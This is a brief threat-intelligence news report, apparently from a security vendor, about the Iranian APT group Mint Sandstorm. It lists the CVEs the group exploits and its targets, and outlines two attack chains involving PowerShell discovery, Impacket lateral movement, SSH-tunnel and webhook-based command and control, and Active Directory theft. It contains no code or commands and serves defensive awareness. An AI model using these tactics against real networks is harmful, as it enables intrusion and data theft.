HQ/EMEAFind out how we can help your business
Mint Sandstorm, an advanced Iranian persistent threat group, has allegedly conducted several malicious attacks against the United States’ critical infrastructures from 2021 to 2022. This APT, also known as PHOSPHORUS, could be upgrading its tactics, techniques, and procedures (TTPs) to make its attacks more efficient.
The group has also begun weaponising several vulnerabilities in enterprise applications by utilising publicly available POCs. Mint Sandstorm uses custom tools against their targets, like energy firms and the transportation sectors.
Researchers confirmed that the APT group started exploiting several security flaws, such as CVE-2021-44228, CVE-2021-45046 (Log4Shell), CVE-2022-47986 (IBM Aspera Faspex), and CVE-2022-47966 (Zoho ManageEngine).
This Iranian threat group targets public and private organisations and individuals like journalists, activists, Defence Industrial Base, political figures, and personnel from various government agencies.
In addition, one of the subgroups of the earlier mentioned cybercriminal organisation executed a chain of attacks against seaports, transportation systems, energy firms, utilities, and gas entities.
Mint Sandstorm has a couple of attack methods that could start their attacks.
According to investigations, the Mint Sandstorm APT launches a custom PowerShell script for the discovery phase that tries to harvest information. Subsequently, the group performs one of their two attack chains if their target accomplishes their requirements.
The group’s first attack chain utilises an Impacket for moving laterally across the system. The attack chain depends on PowerShell scripts to identify admin accounts and activate RDP connections. The process also uses an SSH tunnel for command and control and steals the Active Directory database to access user account data.
The second method also uses Impacket for moving laterally and also the webhook[.]site for command-and-control to create scheduled tasks and establish persistence. Furthermore, the attached chain launches a custom malware payload instead of using a simple script and publicly available tools.
Cybersecurity experts explained that Mint Sandstorm’s constant upgrades in its TTPs could make it evolve into a more dangerous threat. Users should block executable files from running unless it has the proper criteria and does not come from a suspicious source.
